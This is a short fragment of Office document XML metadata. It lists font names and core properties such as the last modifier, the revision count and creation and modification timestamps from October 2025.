      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Arial</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Hamza Nour</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-12T15:18:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-12T15:18:13Z</dcterms:modified>
</cp:coreProperties>
</file>